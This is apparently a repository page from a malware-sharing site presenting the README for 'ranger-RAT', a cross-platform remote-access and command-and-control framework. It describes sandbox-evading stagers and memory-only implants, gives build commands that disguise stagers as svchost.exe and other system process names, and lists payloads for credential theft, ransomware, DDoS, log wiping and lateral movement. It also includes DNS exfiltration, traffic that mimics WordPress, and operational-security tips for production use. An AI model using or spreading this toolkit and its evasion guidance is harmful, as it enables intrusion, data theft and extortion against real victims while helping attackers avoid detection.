← back to reliquary

ranger-RAT

36 files

README

Ranger

A Malleable, Cross-Platform C2 Framework with WordPress Mimicry & DNS Exfiltration

Ranger is a command and control framework designed for red team operations, security research, and adversary simulation. It features a three-stage deployment model, advanced evasion techniques, and a modular payload architecture that works across Windows, Linux, macOS, Android, and iOS.

Key Features

Multi-Layer Evasion

  • Stage 1 (Stager): Compiled executable with environment keying, sandbox detection, and self-destruct
  • Stage 2 (Implant): Memory-only Python execution, B-Tier process masking (taskhostw.exe, metadatah, packagekitd)
  • Stage 3 (C2): WordPress-mimicking Nginx proxy with cookie-based data transfer

Cryptographic Trust

  • Ed25519-signed payloads with timestamp/nonce replay protection
  • Fernet-encrypted C2 channels with per-implant session keys
  • Hardware-anchored fingerprinting (MAC + disk serial)

Multi-Channel Communication

  • Primary Channel: HTTPS with cookie-embedded data (mimics web traffic)
  • Secondary Channel: DNS tunneling for stealthy exfiltration
  • Fallback: Legacy AES-EAX for backward compatibility

Modular Payload System

  • 30+ pre-built payloads in /payloads directory
  • Dynamic loading from C2 without recompilation
  • Support for custom modules via simple Python interface

Operator Dashboard

  • Real-time implant monitoring with jitter analysis
  • DNS exfil viewer with data reconstruction
  • Payload management and deployment console

Architecture Overview


┌─────────────┐     HTTPS      ┌─────────────┐     DNS      ┌─────────────┐
│   STAGER    │ ─────────────> │     C2      │ ───────────> │   CLIENT    │
│ (compiled)  │ <───────────── │   Server    │ <─────────── │   Implant   │
└─────────────┘    Payloads    └─────────────┘   Queries    └─────────────┘
                                    │
                                    ▼
                            ┌─────────────┐
                            │  WordPress  │
                            │  Nginx Mask │
                            └─────────────┘

Installation

# Ubuntu/Debian
sudo apt-get update
sudo apt-get install -y nginx python3-pip openssl

# Python packages
pip3 install flask cryptography pycryptodome dnspython --break-system-packages

clone in

# Clone the repository
git clone https://github.com/ekomsSavior/ranger.git
cd ranger

Deploy Nginx mask and C2

sudo ./deploy.sh

Start the C2 server

python3 c2.py

Access dashboard

https://your-server:4444/phase1/dashboard

Usage Guide

1. Generate a Stager

# Windows stager
pyinstaller --onefile --noconsole --name svchost.exe stager.py

# Linux stager
pyinstaller --onefile --name packagekitd stager.py

# macOS stager
pyinstaller --onefile --name metadatah stager.py

2. Start DnsTunnel

python3 dnstunnel.py

3. Control Implants via Dashboard

Access https://your-c2:4444/phase1/dashboard to:
- View active implants with process names and jitter scores
- Send commands (shell, recon, file operations)
- Enable DNS tunneling for exfiltration
- Monitor exfiltrated data

Payload Modules

The framework includes 30+ ready-to-use payloads:

Category Payloads
Recon sysrecon.py, linpeas_light.py, cloud_detector.py
Credential Theft browserstealer.py, hashdump.py, aws_credential_stealer.py
Persistence advanced_cron_persistence.py, process_inject.py
Evasion logcleaner.py, dnstunnel.py, polyloader.py
Lateral Movement sshspray.py, container_escape.py
Impact fileransom.py, ddos.py, k8s_secret_stealer.py

Configuration

C2 Settings (c2.py)

C2_PORT = 4444
C2_HOST = '0.0.0.0'
DNS_DOMAIN = "updates.your-domain.com"
COOKIE_NAMES = ['_ga', '_gid', 'xsid', 'PHPSESSID', 'wordpress_']

Nginx Mask (nginx/wordpress-mask.conf)

  • Proxies only implant traffic to C2
  • Redirects scanners to WordPress.org
  • Includes realistic WordPress headers

Implant Behavior (implant.py)

  • B-Tier process targeting (taskhostw.exe, sihost.exe, CompatTelRunner.exe)
  • Jittered beacon intervals (60-180s with time-based shaping)
  • Environmental keying (uptime, RAM, sandbox artifacts)

Operator Dashboard Features

Implant Monitoring

  • Jitter Score: Detects sandboxed implants with perfect timing
  • Process Tracking: Monitors process name changes
  • DNS Status: Shows which implants use DNS tunneling

Command Interface

  • Shell: Execute system commands
  • Recon: Gather system information
  • Download/Upload: File transfer
  • DNS Toggle: Enable/disable DNS exfiltration

Exfil Viewer

  • Reconstructed data from DNS fragments
  • Channel identification (HTTPS vs DNS)
  • Timestamp and size metadata

OpSec Recommendations

Production Deployment

  1. Use valid SSL certificates (Let's Encrypt)
  2. Front with CDN (Cloudflare, AWS CloudFront)
  3. Rotate domains regularly
  4. Monitor jitter scores for sandbox detection
  5. Encrypt database at rest

Evasion Tips

  • Vary cookie names (already implemented)
  • Add realistic delays between DNS queries
  • Mix in legitimate traffic to your C2 domain
  • Use multiple fallback domains for DNS tunnel

Legal Disclaimer

This software is intended for authorized security testing and educational purposes only. Users are responsible for complying with all applicable laws and regulations. The authors assume no liability for misuse or damage caused by this program.

source code

files

viewer

select a file
// click a file to view source

license

MIT License Copyright (c) 2026 ek0mssavi0r / Church of Malware Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. USE AT YOUR OWN RISK. NO WARRANTY PROVIDED.
download .zip // inspect all source before execution
Church of Malware · read. become. evolve.